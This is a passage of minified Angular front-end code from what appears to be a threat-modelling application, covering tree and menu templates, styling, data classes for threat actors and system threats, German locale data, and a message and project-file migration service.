5px;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],["style","margin-right: 10px; margin-left: -5px; font-size: smaller;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],[4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip",4,"ngIf"],["addMenu","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["style","margin-left: auto; margin-right: 5px; opacity: 1;",4,"ngIf"],["color","primary",2,"margin-right","5px",3,"disabled","checked","change"],[2,"margin-right","5px"],["matTooltipShowDelay","1000",2,"margin-right","10px","margin-left","5px",3,"matTooltip"],["matTooltipShowDelay","1000",2,"margin-right","10px","margin-left","-5px","font-size","smaller",3,"matTooltip"],["id","renameBox","type","text","autofocus","","onfocus","this.select();",2,"width","-webkit-fill-available",3,"spellcheck","ngModel","keydown","focusout"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip"],["mat-menu-item","",3,"click"],[2,"margin-left","auto","margin-right","5px","opacity","1"],[1,"disable-select",3,"click","dblclick","contextmenu"],[1,"mat-tree-node"],["mat-icon-button","","matTreeNodeToggle","",3,"click"],[1,"mat-icon-rtl-mirror",2,"opacity","1"],["style","margin-right: 10px;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],["mat-icon-button","","style","margin-left: auto; margin-right: 5px; opacity: 1;","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip",4,"ngIf"],["style","margin-right: 5px; opacity: 1;",3,"marginLeft",4,"ngIf"],["role","group"],["matTreeNodeOutlet",""],["matTooltipShowDelay","1000",2,"margin-right","10px",3,"matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","5px","opacity","1",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],[2,"margin-right","5px","opacity","1"],["mat-menu-item","",3,"matMenuTriggerFor"],["collapseMenu","matMenu"],["expandMenu","matMenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"disabled","matMenuTriggerFor","matMenuTriggerData"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"mat-tree",0),s(1,"\n  "),s(2,"\n  "),s(3,"\n  "),ne(4,xRe,30,20,"mat-tree-node",1),s(5,"\n  "),s(6,"\n  "),ne(7,BRe,45,21,"mat-nested-tree-node",2),s(8,"\n"),u(),s(9,"\n\n"),m(10,"mat-menu",null,3),s(12,"\n  "),ne(13,qRe,33,8,"ng-template",4),s(14," \n"),u(),s(15,"\n\n"),it(16,"div",5,6),s(18," \n"),m(19,"mat-menu",null,7),s(21," \n  "),ne(22,QRe,33,18,"ng-template",4),s(23," \n"),u(),s(24," \n"),m(25,"mat-menu",null,8),s(27,"\n  "),ne(28,KRe,3,1,"ng-template",4),s(29," \n"),u()),2&e){const n=Ti(20);V("dataSource",i.dataSource)("treeControl",i.treeControl),C(7),V("matTreeNodeDefWhen",i.HasChild),C(9),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,oa,J3,Kw,Yw,Xw,Y3,ab,br,da,Xo,qo,po,Zc,Pa,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.tab-icon[_ngcontent-%COMP%]{margin-right:8px}.mat-tree-node[_ngcontent-%COMP%]{min-height:28px!important;height:28px}.mat-tree-node[_ngcontent-%COMP%]:hover   .mat-icon[_ngcontent-%COMP%]{opacity:1}.mat-tree-node[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:.4}.nav-tree-invisible[_ngcontent-%COMP%]{display:none}.nav-tree[_ngcontent-%COMP%]   ul[_ngcontent-%COMP%], .nav-tree[_ngcontent-%COMP%]   li[_ngcontent-%COMP%]{margin-top:0;margin-bottom:0;list-style-type:none}.nav-tree[_ngcontent-%COMP%]   .mat-nested-tree-node[_ngcontent-%COMP%]   div[role=group][_ngcontent-%COMP%]{padding-left:20px}.nav-tree[_ngcontent-%COMP%]   div[role=group][_ngcontent-%COMP%] > .mat-tree-node[_ngcontent-%COMP%]{padding-left:20px}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-light[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.highlight-dark[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.mat-icon-button[_ngcontent-%COMP%]{width:30px}.disable-select[_ngcontent-%COMP%]{user-select:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none}"]}),t})(),CT=(()=>{class t{constructor(){this.showLeftBar=!0}OnSameRoute(){this.showLeftBar=!this.showLeftBar}SetNavTreeData(e){this.navTree.SetNavTreeData(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],viewQuery:function(e,i){if(1&e&&Mi(df,5),2&e){let n;Vt(n=Bt())&&(i.navTree=n.first)}},decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})();class dM extends Ln{constructor(a,e,i){super(a),this.StepProperties=["Application","Sector","Function","Features","Connectivity","LocEnv","Accessories","ProductionProcess","Criticality","Requirements","TargetMarket","Standards","InvolvedPeople","Budget","Timeframe","ExpectedOutput","Assumptions"],this.project=e,this.config=i,this.Sector||(this.Sector=[]),this.Function||(this.Function=[]),this.Features||(this.Features=[]),this.Accessories||(this.Accessories=[]),this.Application||(this.Application=[]),this.Requirements||(this.Requirements=[]),this.Criticality||(this.Criticality=[]),this.LocEnv||(this.LocEnv=[]),this.Connectivity||(this.Connectivity=[]),this.ProductionProcess||(this.ProductionProcess=[]),this.TargetMarket||(this.TargetMarket=[]),this.Standards||(this.Standards=[]),this.InvolvedPeople||(this.InvolvedPeople=[]),this.Budget||(this.Budget=[]),this.Timeframe||(this.Timeframe=[]),this.ExpectedOutput||(this.ExpectedOutput=[]),this.Assumptions||(this.Assumptions=[])}get Sector(){return this.Data.Sector}set Sector(a){this.Data.Sector=a}get Function(){return this.Data.Function}set Function(a){this.Data.Function=a}get Features(){return this.Data.Features}set Features(a){this.Data.Features=a}get Accessories(){return this.Data.Accessories}set Accessories(a){this.Data.Accessories=a}get Application(){return this.Data.Application}set Application(a){this.Data.Application=a}get Requirements(){return this.Data.Requirements}set Requirements(a){this.Data.Requirements=a}get Criticality(){return this.Data.Criticality}set Criticality(a){this.Data.Criticality=a}get LocEnv(){return this.Data.LocEnv}set LocEnv(a){this.Data.LocEnv=a}get Connectivity(){return this.Data.Connectivity}set Connectivity(a){this.Data.Connectivity=a}get ProductionProcess(){return this.Data.ProductionProcess}set ProductionProcess(a){this.Data.ProductionProcess=a}get TargetMarket(){return this.Data.TargetMarket}set TargetMarket(a){this.Data.TargetMarket=a}get Standards(){return this.Data.Standards}set Standards(a){this.Data.Standards=a}get InvolvedPeople(){return this.Data.InvolvedPeople}set InvolvedPeople(a){this.Data.InvolvedPeople=a}get Budget(){return this.Data.Budget}set Budget(a){this.Data.Budget=a}get Timeframe(){return this.Data.Timeframe}set Timeframe(a){this.Data.Timeframe=a}get ExpectedOutput(){return this.Data.ExpectedOutput}set ExpectedOutput(a){this.Data.ExpectedOutput=a}get Assumptions(){return this.Data.Assumptions}set Assumptions(a){this.Data.Assumptions=a}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new dM(a,e,i)}}class mM extends Ln{constructor(a,e,i){super(a),this.StepProperties=["DeviceGoals","BusinessGoals","BusinessImpact"],this.project=e,this.config=i,this.DeviceGoals||(this.DeviceGoals=[]),this.BusinessGoals||(this.BusinessGoals=[]),this.BusinessImpact||(this.BusinessImpact=[])}get DeviceGoals(){return this.Data.DeviceGoals}set DeviceGoals(a){this.Data.DeviceGoals=a}get BusinessGoals(){return this.Data.BusinessGoals}set BusinessGoals(a){this.Data.BusinessGoals=a}get BusinessImpact(){return this.Data.BusinessImpact}set BusinessImpact(a){this.Data.BusinessImpact=a}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new mM(a,e,i)}}class jp extends Ln{constructor(a,e,i){super(a),this.project=e,this.Motive||(this.Motive=[]),this.Capabilities||(this.Capabilities=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get Motive(){return this.Data.Motive}set Motive(a){this.Data.Motive=a}get Capabilities(){return this.Data.Capabilities}set Capabilities(a){this.Data.Capabilities=a}get Likelihood(){return this.Data.Likelihood}set Likelihood(a){this.Data.Likelihood=a}CheckUniqueNumber(){return this.project.GetThreatActors().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"TS"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){a.GetThreatSources().RemoveThreatActor(this)}static FromJSON(a,e,i){return new jp(a,e,i)}}class uM extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.sourceIDs||(this.Data.sourceIDs=[])}get Sources(){let a=[];return this.Data.sourceIDs.forEach(e=>a.push(this.project.GetThreatActor(e))),a}set Sources(a){this.Data.sourceIDs=null==a?void 0:a.map(e=>e.ID)}AddThreatActor(a){this.Sources.includes(a)||this.Data.sourceIDs.push(a.ID)}RemoveThreatActor(a){this.Sources.includes(a)&&this.Data.sourceIDs.splice(this.Data.sourceIDs.indexOf(a.ID),1)}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new uM(a,e,i)}}class hM extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Impact||(this.Impact=lr.Medium),this.ImpactCats||(this.Data.ImpactCats=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get AffectedAssetObjects(){let a=[];return this.Data.affectedAssetObjectIDs&&(this.project.GetAssetGroups().filter(e=>this.Data.affectedAssetObjectIDs.includes(e.ID)).forEach(e=>a.push(e)),this.project.GetMyDatas().filter(e=>this.Data.affectedAssetObjectIDs.includes(e.ID)).forEach(e=>a.push(e))),a}set AffectedAssetObjects(a){this.Data.affectedAssetObjectIDs=null==a?void 0:a.map(e=>e.ID)}get ThreatCategory(){return this.config.GetThreatCategory(this.Data.threatCategoryID)}set ThreatCategory(a){this.Data.threatCategoryID=null==a?void 0:a.ID,a&&(this.Data.ImpactCats=JSON.parse(JSON.stringify(a.ImpactCats)))}get ImpactCats(){return this.Data.ImpactCats}get Impact(){return this.Data.Impact}set Impact(a){this.Data.Impact=a}CheckUniqueNumber(){return this.project.GetSystemThreats().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"ST"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>n.SystemThreats.includes(this)).forEach(n=>i.push({Type:li.RemoveSystemThreatFromAttackScenario,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{if(n.Type==li.RemoveSystemThreatFromAttackScenario){const r=n.Param;r.SystemThreats=r.SystemThreats.filter(c=>c.ID!=this.ID)}})}static FromJSON(a,e,i){return new hM(a,e,i)}}const Js=void 0;!function wre(t,a,e){(function tae(t,a,e){"string"!=typeof a&&(e=a,a=t[Ji.LocaleId]),a=a.toLowerCase().replace(/_/g,"-"),c1[a]=t,e&&(c1[a][Ji.ExtraData]=e)})(t,a,e)}(["de",[["AM","PM"],Js,Js],Js,[["S","M","D","M","D","F","S"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."],["Sonntag","Montag","Dienstag","Mittwoch","Donnerstag","Freitag","Samstag"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."]],[["S","M","D","M","D","F","S"],["So","Mo","Di","Mi","Do","Fr","Sa"],["Sonntag","Montag","Dienstag","Mittwoch","Donnerstag","Freitag","Samstag"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."]],[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan.","Feb.","M\xe4rz","Apr.","Mai","Juni","Juli","Aug.","Sept.","Okt.","Nov.","Dez."],["Januar","Februar","M\xe4rz","April","Mai","Juni","Juli","August","September","Oktober","November","Dezember"]],[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan","Feb","M\xe4r","Apr","Mai","Jun","Jul","Aug","Sep","Okt","Nov","Dez"],["Januar","Februar","M\xe4rz","April","Mai","Juni","Juli","August","September","Oktober","November","Dezember"]],[["v. Chr.","n. Chr."],Js,Js],1,[6,0],["dd.MM.yy","dd.MM.y","d. MMMM y","EEEE, d. MMMM y"],["HH:mm","HH:mm:ss","HH:mm:ss z","HH:mm:ss zzzz"],["{1}, {0}",Js,"{1} 'um' {0}",Js],[",",".",";","%","+","-","E","\xb7","\u2030","\u221e","NaN",":"],["#,##0.###","#,##0\xa0%","#,##0.00\xa0\xa4","#E0"],"EUR","\u20ac","Euro",{ATS:["\xf6S"],AUD:["AU$","$"],BGM:["BGK"],BGO:["BGJ"],BYN:[Js,"\u0440."],CUC:[Js,"Cub$"],DEM:["DM"],FKP:[Js,"Fl\xa3"],GHS:[Js,"\u20b5"],GNF:[Js,"F.G."],KMF:[Js,"FC"],PHP:[Js,"\u20b1"],RON:[Js,"L"],RUR:[Js,"\u0440."],RWF:[Js,"F.Rw"],SYP:[],THB:["\u0e3f"],TWD:["NT$"],XXX:[],ZMW:[Js,"K"]},"ltr",function XRe(t){const e=Math.floor(Math.abs(t)),i=t.toString().replace(/^[^.]*\.?/,"").length;return 1===e&&0===i?1:5}],"de",[[["Mitternacht","morgens","vorm.","mittags","nachm.","abends","nachts"],void 0,["Mitternacht","morgens","vormittags","mittags","nachmittags","abends","nachts"]],[["Mitternacht","Morgen","Vorm.","Mittag","Nachm.","Abend","Nacht"],void 0,["Mitternacht","Morgen","Vormittag","Mittag","Nachmittag","Abend","Nacht"]],["00:00",["05:00","10:00"],["10:00","12:00"],["12:00","13:00"],["13:00","18:00"],["18:00","24:00"],["00:00","05:00"]]]);let T5=(()=>{class t{constructor(e){this.localization=e}transform(e,i=null){return e?(i||(i="shortDate"),e6(e,i,this.localization.Locale)):""}}return t.\u0275fac=function(e){return new(e||t)(Ee(yT,16))},t.\u0275pipe=Fr({name:"localDate",type:t,pure:!0}),t})(),E5=(()=>{class t{constructor(e){this.localization=e}transform(e,i=null){return e?(i||(i="medium"),e6(e,i,this.localization.Locale)):""}}return t.\u0275fac=function(e){return new(e||t)(Ee(yT,16))},t.\u0275pipe=Fr({name:"localDateTime",type:t,pure:!0}),t})(),JRe=(()=>{class t extends q1{constructor(e){super(),this.translateService=e,this.getRangeLabel=(i,n,r)=>{const c=this.translateService?this.translateService.instant("paginator.of"):"of";if(0===r||0===n)return"0 "+c+" "+r;const d=i*n>(r=Math.max(r,0))?(Math.ceil(r/n)-1)*n:i*n;return d+1+" - "+Math.min(d+n,r)+" "+c+" "+r},this.translateService.onLangChange.subscribe(i=>{this.translateLabels()}),this.translateLabels()}injectTranslateService(e){this.translateService=e,this.translateService.onLangChange.subscribe(()=>{this.translateLabels()}),this.translateLabels()}translateLabels(){this.firstPageLabel=this.translateService.instant("paginator.firstPage"),this.itemsPerPageLabel=this.translateService.instant("paginator.itemsPerPage"),this.lastPageLabel=this.translateService.instant("paginator.lastPage"),this.nextPageLabel=this.translateService.instant("paginator.nextPage"),this.previousPageLabel=this.translateService.instant("paginator.previousPage"),this.changes.next()}}return t.\u0275fac=function(e){return new(e||t)(At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),yT=(()=>{class t{constructor(e,i){this.translate=e,this.locStorage=i,this.locale=this.locStorage.Get(si.LANGUAGE)}get Locale(){return this.locale||"en"}set Locale(e){this.locale=e,this.translate.use(e),this.locStorage.Set(si.LANGUAGE,e)}}return t.\u0275fac=function(e){return new(e||t)(At(Sn),At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function ZRe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"info"),u()),2&t&&at("matTooltip",re(1,1,"general.Info"))}function eSe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"check_circle"),u()),2&t&&at("matTooltip",re(1,1,"general.Success"))}function tSe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"warning"),u()),2&t&&at("matTooltip",re(1,1,"general.Warning"))}function iSe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"error"),u()),2&t&&at("matTooltip",re(1,1,"general.Error"))}function aSe(t,a){if(1&t&&(m(0,"mat-list-item"),s(1,"\n        "),ne(2,ZRe,3,3,"mat-icon",8),s(3,"\n        "),ne(4,eSe,3,3,"mat-icon",8),s(5,"\n        "),ne(6,tSe,3,3,"mat-icon",8),s(7,"\n        "),ne(8,iSe,3,3,"mat-icon",8),s(9,"\n        "),m(10,"div",9),s(11),u(),s(12,"\n        "),m(13,"div",9),s(14),oe(15,"localDateTime"),u(),s(16,"\n      "),u()),2&t){const e=a.$implicit;C(2),V("ngIf","info"==e.type),C(2),V("ngIf","success"==e.type),C(2),V("ngIf","warning"==e.type),C(2),V("ngIf","error"==e.type),C(3),ke(e.text),C(3),ke(re(15,6,e.time))}}function nSe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-chip-list",5),s(3,"\n      "),m(4,"mat-chip",6),he("click",function(){be(e);const n=B();return Me(n.showError=!n.showError)}),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"mat-chip",6),he("click",function(){be(e);const n=B();return Me(n.showWarning=!n.showWarning)}),s(9),oe(10,"translate"),u(),s(11,"\n      "),m(12,"mat-chip",6),he("click",function(){be(e);const n=B();return Me(n.showSuccess=!n.showSuccess)}),s(13),oe(14,"translate"),u(),s(15,"\n      "),m(16,"mat-chip",6),he("click",function(){be(e);const n=B();return Me(n.showInfo=!n.showInfo)}),s(17),oe(18,"translate"),u(),s(19,"\n    "),u(),s(20,"\n    "),m(21,"mat-list"),s(22,"\n      "),ne(23,aSe,17,8,"mat-list-item",7),s(24,"\n    "),u(),s(25,"\n  "),Mt()}if(2&t){const e=B();C(4),V("selected",e.showError),C(1),ke(re(6,9,"general.Error")),C(3),V("selected",e.showWarning),C(1),ke(re(10,11,"general.Warning")),C(3),V("selected",e.showSuccess),C(1),ke(re(14,13,"general.Success")),C(3),V("selected",e.showInfo),C(1),ke(re(18,15,"general.Info")),C(6),V("ngForOf",e.filteredMessages)}}function oSe(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n  "),Mt()),2&t&&(C(3),ke(re(4,1,"dialog.messages.noEntries")))}let rSe=(()=>{class t{constructor(e){this.messages=e,this.showError=!0,this.showWarning=!0,this.showSuccess=!0,this.showInfo=!0}get filteredMessages(){let e=this.messages;return this.showError||(e=e.filter(i=>"error"!=i.type)),this.showWarning||(e=e.filter(i=>"warning"!=i.type)),this.showSuccess||(e=e.filter(i=>"success"!=i.type)),this.showInfo||(e=e.filter(i=>"info"!=i.type)),e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(gp))},t.\u0275cmp=Wt({type:t,selectors:[["app-messages-dialog"]],decls:21,vars:12,consts:[["mat-dialog-title",""],[4,"ngIf"],["align","end"],["mat-button","",3,"mat-dialog-close"],["mat-button","","mat-dialog-close","","cdkFocusInitial",""],["multiple",""],["color","primary",3,"selected","click"],[4,"ngFor","ngForOf"],["mat-list-icon","",3,"matTooltip",4,"ngIf"],["mat-line",""],["mat-list-icon","",3,"matTooltip"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),ne(6,nSe,26,17,"ng-container",1),s(7,"\n  "),ne(8,oSe,6,3,"ng-container",1),s(9,"\n"),u(),s(10,"\n"),m(11,"mat-dialog-actions",2),s(12,"\n  "),m(13,"button",3),s(14),oe(15,"translate"),u(),s(16,"\n  "),m(17,"button",4),s(18),oe(19,"translate"),u(),s(20,"\n"),u()),2&e&&(C(1),ke(re(2,6,"general.Messages")),C(5),V("ngIf",i.messages.length>0),C(2),V("ngIf",0==i.messages.length),C(5),V("mat-dialog-close",!0),C(1),ke(re(15,8,"general.Clear")),C(4),ke(re(19,10,"general.Close")))},dependencies:[Zi,Ri,oa,da,m8,db,es,ts,Or,Lr,Pa,vm,Am,Tm,Em,Xi,E5]}),t})(),A2=(()=>{class t{constructor(e,i,n,r){this.snackBar=e,this.translateService=i,this.locStorage=n,this.dialog=r,this.TIMEOUT=3e3,this.Messages=[],window.onerror=(c,d,T,k,q)=>(c.toString().startsWith("ResizeObserver loop")||this.Error(c.toString(),[d,T,k,q]),!1)}get ErrorMsgs(){return this.Messages.filter(e=>"error"==e.type)}get WarningMsgs(){return this.Messages.filter(e=>"warning"==e.type)}get SuccessMsgs(){return this.Messages.filter(e=>"success"==e.type)}get InfoMsgs(){return this.Messages.filter(e=>"info"==e.type)}get ShowErrors(){let e=this.locStorage.Get(si.MSG_SHOW_ERROR);return null==e||"true"==e}set ShowErrors(e){this.locStorage.Set(si.MSG_SHOW_ERROR,String(e))}get ShowWarnings(){let e=this.locStorage.Get(si.MSG_SHOW_WARNING);return null==e||"true"==e}set ShowWarnings(e){this.locStorage.Set(si.MSG_SHOW_WARNING,String(e))}get ShowSuccesses(){let e=this.locStorage.Get(si.MSG_SHOW_SUCCESS);return null==e||"true"==e}set ShowSuccesses(e){this.locStorage.Set(si.MSG_SHOW_SUCCESS,String(e))}get ShowInfos(){let e=this.locStorage.Get(si.MSG_SHOW_INFO);return null==e||"true"==e}set ShowInfos(e){this.locStorage.Set(si.MSG_SHOW_INFO,String(e))}get ShowUnsavedChanges(){let e=this.locStorage.Get(si.MSG_SHOW_UNSAVED_CHANGED);return null==e||"true"==e}set ShowUnsavedChanges(e){this.locStorage.Set(si.MSG_SHOW_UNSAVED_CHANGED,String(e))}Info(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"info",time:(new Date).toString()}),this.ShowInfos&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-info"})}Success(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"success",time:(new Date).toString()}),this.ShowSuccesses&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-success"})}Warning(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"warning",time:(new Date).toString()}),this.ShowWarnings&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-warning"})}Error(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"error",time:(new Date).toString()}),console.error(n),this.ShowErrors&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-error"})}UnsavedChanges(e,i){let n=this.buildMsg(e,i);this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-warning"})}ShowHistory(){this.dialog.open(rSe,{hasBackdrop:!0,data:this.Messages}).afterClosed().subscribe(i=>{i&&(this.Messages.length=0)})}buildMsg(e,i){let n="";try{n=this.translateService.instant(e)}catch(r){n=e}return i&&"string"==typeof i?n+=" "+i:i&&"Array"==this.getParamType(i)?(n+=" ",i.forEach(r=>{n+=String(r)+"; "}),n=n.substring(0,n.length-2)):i&&"Object"==this.getParamType(i)?n=n+"\n"+JSON.stringify(i,null,2):i&&(n+=" Unknown parameters, see console",console.log(i)),n}getParamType(e){return null===e?"null":void 0===e?"undefined":e.constructor==="test".constructor?"String":e.constructor===[].constructor?"Array":e.constructor==={}.constructor?"Object":""}}return t.\u0275fac=function(e){return new(e||t)(At(I1e),At(Sn),At(_r),At(vu))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),D5=(()=>{class t{constructor(e,i){this.messageService=e,this.translate=i,this.configUpdates=[this.configV2,this.configV3,this.configV4,this.configV5],this.projectUpdates=[this.projectV2,this.projectV3,this.projectV4,this.projectV5,this.projectV6,this.projectV7]}UpdateProjectFile(e){let i=this.UpdateConfigFile(e.config),n=this.updateFile(e,!1);return i=i||n,i}UpdateConfigFile(e){return this.updateFile(e,!0)}updateFile(e,i){const n=i?t.ConfigVersion:t.ProjectVersion,r=i?"Config":"Project",c=i?this.configUpdates:this.projectUpdates;if(e.Data.Version!=n){const d=e.Data.Version;try{for(let T=e.Data.Version+1;T<=n;T++)c[T-2](e),e.Data.Version=T;return setTimeout(()=>{this.messageService.Success(Gi.Format(this.translate.instant("messages.success.updated"+r),d.toString(),n.toString()))},1e3),!0}catch(T){setTimeout(()=>{this.messageService.Error(Gi.Format(this.translate.instant("messages.erorr.updateFailed"+r),d.toString(),n.toString()),T)},1e3)}}return!1}projectV2(e){e.systemThreats.forEach(i=>{const n=["Confidentiality","Integrity","Availability","Authorization","Authenticity","Non-repudiation","Auditability","Trustworthiness","Safety","Privacy","Compliance","Financial","Reputation","Customer Satisfcation","Production Process"];let r=[];for(const[c,d]of Object.entries(i.ImpactCats))1==d&&r.push(n.indexOf(c)+1);i.ImpactCats=r})}projectV3(e){let i=[];e.threatActors=[],e.threatSources.Sources.forEach(n=>{const r=Fo();e.threatActors.push({ID:r,Name:n.Name,Description:"",Likelihood:n.Likelihood,Motive:n.Motive}),i.push(r)}),delete e.threatSources.Sources,e.threatSources.sourceIDs=i}projectV4(e){let i=n=>{n.Note=n.Task,delete n.Task,n.IsChecked=n.IsDone,delete 